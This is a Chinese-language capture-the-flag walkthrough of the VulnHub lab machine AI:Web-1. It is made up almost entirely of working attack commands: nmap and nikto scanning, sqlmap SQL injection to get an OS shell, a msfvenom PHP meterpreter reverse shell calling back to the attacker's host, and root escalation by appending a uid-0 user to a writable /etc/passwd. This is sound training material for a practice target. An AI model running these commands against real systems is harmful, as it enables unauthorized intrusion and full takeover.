AI:Web-1靶场题解
前期准备
镜像下载
https://www.vulnhub.com/entry/ai-web-1,353/
环境配置:
在VM以net连接打开虚拟机
使用的机器:
攻击机:kali linux
靶机:ip随配(192.168.119.139)
渗透开始
1.nmap发现主机,扫描路径
nmap -A 192.168.119.139
nikto -h http://192.168.119.139/m3diNf0/
2.访问页面,sql注入
http://192.168.119.139/m3diNf0/info.php
获得网站根目录:
/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
http://192.168.119.139/se3reTdir777/#
使用sqlmap跑注入,获得shell
sqlmap.py -r "C:\Users\DELL\Desktop\121.txt" -p uid --os-shell
路径输入:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/
拿到shell,并获得上传文件tmpuuqpk.php
3.上传木马,获得权限
访问网页 http://192.168.119.139/se3reTdir777/uploads/tmpuuqpk.php
上传msfvenom生成的php马
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.119.129 lport=5555 -f raw > shell.php
反弹shell得到权限
python -c 'import pty; pty.spawn("/bin/bash")'
4.提权
查看 /etc/passwd 文件权限,发现是www-data用户拥有
ls -al /etc/passwd
由于passwd文件是具有s权限的,所以可以通过写入一个用户,在进行提权
perl -le 'print crypt("123456","aa")'
echo "haha:aaAN1ZUwjW7to:0:0:i_am_root:/root:/bin/bash" >> /etc/passwd
cat /etc/passwd | grep haha
提权成功,获得flag.txt文件
su haha
cd /root
ls
cat flag.txt